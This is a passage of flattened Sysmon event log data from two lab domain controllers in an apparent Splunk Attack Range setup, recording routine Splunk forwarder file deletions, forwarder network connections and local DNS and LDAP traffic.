Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0A8C575F01832182A9E8231FDFF85A7A,SHA256=0015F8B8AF75F23579215F95867727709026E5FAC6E8B4AE7A662591BAAED1BB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002247245Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:24.159{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8972A3477E6142C97E0FD9B592009720,SHA256=CFE84C9453660710D7C7C515C4790A802321BDAC3C444844DFF1A836A1916B2A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002247247Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:25.203{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1D1AD65189D709F614CAB75DC96DE51B,SHA256=AC9092F35527A0D661FE0F4214A9A9FDB3697B0A0FB57326F8637E216772F264,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002247246Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:25.068{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=65254FDA86D8CD85700FACF8A3622B95,SHA256=B0CFBE1372EC8B554D7F76E54B3B79E2A968AC8CBB1D8D843EC002DC3AEC8D62,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002247249Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:26.218{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=90D8125BA88751716D5791E2064CB73C,SHA256=7160B627040017CC4F51FBE658A995A500DD821F72E39DA4F507CC1B1C881C63,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002247248Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:15.202{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local60239-false10.0.1.12-8000- 23542300x80000000000000002247251Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:27.843{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=02C156BAC7D5B526F914094450082816,SHA256=EA94D61FBD6E92016B1A35A77DAFD3F9FCE90EA8C69E3E53C284BD8A0115B83B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002247250Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:27.249{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B1CDE8A2A7F37014192CA143DF1A4162,SHA256=F6D08DF8493530ED1263E90BAA08B9CA889C4848816E79ADD65F978D2CC100B2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002247252Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:28.268{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DFDC67C04446E1D0910BB99905346E09,SHA256=48B7D51C9592AA202A8233D9328D02BEEE6E4804658BEAB9F541D5C2EB4FAA7C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002247253Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:29.281{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EA88BA46CF5D38C7D23B68D22C15A184,SHA256=3C7763C0255170768495C073A07299DC3A4442E5241F336BCBA737CF43DE239D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002247256Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:20.201{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local60240-false10.0.1.12-8000- 23542300x80000000000000002247255Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:30.312{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1D568DCFE321F2915175DF77716D72EE,SHA256=D9F5EBA1145C18C3BFD3AB368B955B99576A436A3FAEC28301CDB79535A2FC0C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002247254Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:30.124{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D8048A057C8AA83191DD06B209A844BE,SHA256=E518436A6668BA38369E00B9005BA5438B95780E9BED073AA3B88B8EDF38B9CC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002247258Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:31.843{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E6C89CC4019C1645388900470B00AFBB,SHA256=D97E5123D10241F8989DB31423A3004C365A9570EAE0E141A1B4D060D7C30A02,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002247257Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:31.343{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4EC5D3D934B333EFE2D3BCF769521ECB,SHA256=E2F13456AAF6E3E7DD546A9F15686C0FF87F88EAD908847EAFA57639D76B2249,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002247261Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:32.863{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7702CFDEB0C43F24192CB45C3195CACE,SHA256=DA3141B4D6648CE967FCE76233D7235F7303E0DD3D014D4AFBBC458CDCA1101D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002247260Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:32.406{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D6CEC333E51ADDE4409C6255651E0608,SHA256=BF429D4D150478D234EE393642356340BCBE2255320E8E5FC45C2E3E3290D2F6,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002247259Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:21.967{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local54721- 23542300x80000000000000002247263Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:33.421{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=13AF714B536D474C6ED3EC5F7380542A,SHA256=FA5BF58AD5102724292815AD1F26FB96FD37A592E2F23A347D5DC2C7CB93391F,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002247262Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:22.982{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-974.attackrange.local53domainfalse127.0.0.1win-dc-974.attackrange.local54721- 23542300x80000000000000002247264Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:34.455{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D612C4AD9DA1667D8F87CAB8715F6A41,SHA256=0F77A6333308DF20317C9BBF8C6A6D8B147046609C6FC8A157E03085085C377D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002247266Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:35.468{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B4DCB2F8D30BBFB639041CC7464E143E,SHA256=03FE486E31CF54657F6F10AF5106BE17A032BED1E3180E3854EB144F1D7FDBE8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002247265Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:35.160{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C913384978FEA661A289F533008F5D4E,SHA256=84B486E3CDDD3CC844D839AC2752D4B845DBB88BCCF23AB84C36DDA605423D95,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002247270Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:36.568{05ADC7E1-FB1F-603C-5979-00000000AD01}6484NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=D04DD730C2DFA173B41D98E6E0FBCE24,SHA256=25BD0354816452BB32A75B30DADE46EF8E59DD04BE7128F431B20468F632A399,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002247269Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:36.484{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D0DD8A276CFB8721E9E6D00A0EA88C34,SHA256=C60929D8FE85056302FE14B00265C224ED71057990506B70680725E0BAE835B5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002247268Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:36.343{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=87CEB7D215C348E422F1AC3A7AE584CA,SHA256=22A111167DF0B6C129B399A8D79BF1F85E43D351E977A5E76EC6BC37C02BEDE5,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002247267Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:25.233{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local60242-false10.0.1.12-8000- 23542300x80000000000000002247273Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:37.566{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A0D83EB4178F5932B9E49F16169EBA54,SHA256=40802BBFEB2F6AE00D1FDB5C1A68AE7B21800FF6B46117BB1FE9B228A92C711B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002247272Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:37.515{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FCEE5754C1D013A0E9843067EA1DFFD4,SHA256=ED477095D221C06D60D02F6E58079FC2A3E17BAB94EA84EDC8C738C250F650B0,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002247271Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:26.451{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local58605- 23542300x80000000000000002247276Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:38.593{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF213BAA3D813FF00ADAB321215F488D,SHA256=01A597A1CAD82E381B573E439F4489B45E0E6DBA113E76F18FD50B44DFDDAE8E,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002247275Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:27.686{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local60243-false10.0.1.12-8089- 354300x80000000000000002247274Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:27.466{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-974.attackrange.local53domainfalse127.0.0.1win-dc-974.attackrange.local58605- 23542300x80000000000000002247278Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:39.609{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EB19B7B64D358B3350BD8E6A7416D8D5,SHA256=14BB83AF02A100A0F12DC2F263734B8C617A1B25A31BE2EAC90F70C87A01349E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002247277Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:39.218{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B0C0899E5A855FCCCC3781E46BDB56D3,SHA256=C574AA104FF1F9571E5197E452D210E0E0A230CDA1A38C92ED6A0A01DDE70BCB,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002247280Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:30.248{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local60244-false10.0.1.12-8000- 23542300x80000000000000002247279Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:59:40.368{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=82EE7DC2DB6579982228C537431D99ED,SHA256=94D9A7905EB5D313E78750933D95865C477D7B83F8FB0378E6BF5D290D0BCADA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001765165Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-03 15:27:35.037{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2A2748221DAE39252BD2813C92212B31,SHA256=B67BC063D173DB1E8284F17916B66937D339B0C32AF5A0F0E84A8173E6726EA4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001765166Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-03 15:27:36.037{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=55E3447147880144CEAA48732B3981D6,SHA256=FAEA9350D8F5E16D52A25CF1E0FD72198715396A0FCC3C351CE4EECA28E1EC48,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001765169Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-03 15:27:34.491{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local52318-false10.0.1.12-8000- 23542300x80000000000000001765168Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-03 15:27:37.272{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FF0A71C102DB08779E3A1BC0B61A45C2,SHA256=188B51F7FBA7BD46F9336502F12D9D246CCFE55A99D504FE80F38CD84240E7DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001765167Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-03 15:27:37.037{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4D3BE3A6A7819E0DD95DA76C70206112,SHA256=8080616F5FB545AC4957228F914708CEACF09E5D59E8A109DB98DDE9912D9D9D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001765170Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-03 15:27:38.069{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F09AF26FF907002486A59A3AFAF90069,SHA256=D36B40774FAE55B25761798F347591D698385F5593BDE25050A5AADEDFBFCDB2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001765171Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-03 15:27:39.084{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ACA5445CF660B98308B05E6F86D4CC7C,SHA256=A5FA8DE701597C15D296D546473C9A81A07B89038A1353B50194D94F1619FCCC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001765173Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-03 15:27:40.084{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7C350EECEB4993814D471D256EFD50DE,SHA256=3A3218AAE261EF13D1E1CC4D84ADB54741DC253A7721EAAC9198C077AB32AC82,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001765172Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-03 15:27:40.022{5ABCFE62-84A2-603E-A500-00000000AD01}2876NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=78FFC68B55788172C6F01776E1175A4A,SHA256=7EFF8D2B790A6CE455B9D8C44CE8A2AF78181139506EC2EC15800E71AC1D548F,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001765176Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-03 15:27:38.272{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local52319-false10.0.1.12-8089- 23542300x80000000000000001765175Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-03 15:27:41.116{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A8FC231E534228716DD0D33F9701C9EF,SHA256=1FEEFBFE02D7E517B9F94C152BEFFAEE4F27605FE7F0ED05768DF5B6D3C95826,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001765174Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-03 15:27:41.022{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=36C9DCD92DB8B6B89D2BDFC547B5A406,SHA256=626A8D0DFC97100F0208BAE816C2477B2C74A3366E85526AC6D5DB40416041CB,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001765179Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-03 15:27:39.507{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local52320-false10.0.1.12-8000- 23542300x80000000000000001765178Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-03 15:27:42.241{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=09F250286FDFBFC6CC7F61D18C3D9029,SHA256=BA0EDC608F873842C8B0E6356CCFB56A9BB1E75CCF78F00D7C77F2A7A9E316B6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001765177Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-03 15:27:42.225{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CFA66234A4795D8FE4E0CB95B2405F1D,SHA256=92311057E58F87F6A890A30B7F816B6461EAB4CF3AF4168455C86B60443FBADA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001765180Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-03 15:27:43.256{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DDA746D6268385A2BADE864754C82C17,SHA256=15971416E44315063F938AAF4CC3EA4D32E88F1115F5A0D973D813D4F90135BF,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001765184Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-03 15:27:42.069{5ABCFE62-842D-603E-0B00-00000000AD01}632C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local52321-true0:0:0:0:0:0:0:1win-dc-228.attackrange.local389ldap 354300x80000000000000001765183Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-03 15:27:42.069{5ABCFE62-843F-603E-3000-00000000AD01}2464C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local52321-true0:0:0:0:0:0:0:1win-dc-228.attackrange.local389ldap 23542300x80000000000000001765182Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-03 15:27:44.819{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 